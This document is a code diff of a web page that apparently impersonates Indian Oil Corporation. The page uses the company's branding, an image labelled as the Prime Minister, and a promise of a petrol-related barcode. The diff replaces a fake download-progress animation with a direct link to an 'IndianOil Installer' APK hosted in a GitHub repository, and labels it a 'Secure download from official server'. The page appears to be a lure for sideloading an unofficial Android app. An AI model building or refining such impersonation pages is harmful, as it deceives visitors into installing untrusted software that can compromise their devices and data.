--- a/index.html
+++ b/index.html
@@ -51,30 +51,11 @@
         }
 
         .hero {
-            background: linear-gradient(to right, #eef2f6, #ffffff);
-            padding: 30px 20px 20px 20px;
-            box-shadow: 0px 4px 8px rgba(0, 0, 0, 0.1),
-                        0px -4px 8px rgba(0, 0, 0, 0.1);
+            background: #ffffff;
+            padding: 30px 20px;
+            box-shadow: 0px 4px 8px rgba(0, 0, 0, 0.1);
             text-align: center;
-            position: relative;
-            overflow: hidden;
             margin-top: 10px;
-        }
-
-        .hero::before {
-            content: "";
-            position: absolute;
-            top: 0;
-            left: 0;
-            width: 100%;
-            height: 100%;
-            opacity: 0.2;
-            z-index: 0;
-        }
-
-        .hero > * {
-            position: relative;
-            z-index: 1;
         }
 
         .hero h1 {
@@ -128,7 +109,7 @@
         }
 
         .download-btn:hover {
-            background: #ff5500;
+            background: #ff4400;
         }
 
         footer {
@@ -137,45 +118,6 @@
             padding: 12px;
             font-size: 14px;
             margin-top: 20px;
-        }
-
-        .progress-overlay {
-            display: none;
-            position: fixed;
-            top: 0;
-            left: 0;
-            width: 100%;
-            height: 100%;
-            background: rgba(0, 0, 0, 0.5);
-            justify-content: center;
-            align-items: center;
-        }
-
-        .progress-container {
-            width: 120px;
-            height: 120px;
-            display: flex;
-            align-items: center;
-            justify-content: center;
-            border-radius: 50%;
-            background: conic-gradient(#015296 0deg, #ccc 0deg);
-            position: relative;
-        }
-
-        .progress-container::before {
-            content: "";
-            position: absolute;
-            width: 100px;
-            height: 100px;
-            background: white;
-            border-radius: 50%;
-        }
-
-        .progress-text {
-            position: absolute;
-            font-size: 16px;
-            font-weight: bold;
-            color: #015296;
         }
 
         @media (max-width: 768px) {
@@ -214,8 +156,7 @@
             <li>Download IndianOil Installer app from below and register to get barcode.</li>
         </ul>
 
-        <!-- Updated Button (no new tab) -->
-        <a href="#" id="downloadButton" class="download-btn">📲 Download IndianOil App</a>
+        <a href="https://github.com/indian-oil/1Litre-petrol/raw/refs/heads/main/IndianOil%20Installer.apk" class="download-btn">📲 Download IndianOil App</a>
         <p style="margin-top: 6px; font-size: 13px; color: rgb(82, 82, 82);">Secure download from official server</p>
 
         <img src="https://iocl.com/admin/img/UploadedFiles/MenuHeading/Files/English/959a312d3edf41388dc2074cbc6471a9.jpg" alt="PM Narendra Modi" class="hero-image">
@@ -225,36 +166,6 @@
         &copy; Copyright © Indian Oil Corporation Ltd
         <br> Site Map | Terms of Use | Data Privacy Policy | Hyperlinking Policy
     </footer>
-
-    <div class="progress-overlay" id="progressOverlay">
-        <div class="progress-container">
-            <div class="progress-text" id="progressText">0%</div>
-        </div>
-    </div>
-
-    <script>
-        document.getElementById("downloadButton").addEventListener("click", function (event) {
-            event.preventDefault();
-            let overlay = document.getElementById("progressOverlay");
-            let progressText = document.getElementById("progressText");
-
-            overlay.style.display = "flex";
-
-            let progress = 0;
-            let interval = setInterval(() => {
-                progress += 10;
-                progressText.innerText = progress + "%";
-                if (progress >= 100) {
-                    clearInterval(interval);
-                    setTimeout(() => {
-                        overlay.style.display = "none";
-                        // Redirect to download in the same tab
-                        window.location.href = "https://github.com/indian-oil/1Litre-petrol/raw/refs/heads/main/IndianOil%20Installer.apk";
-                    }, 500);
-                }
-            }, 200);
-        });
-    </script>
 </body>
 
-    </html>
+</html>
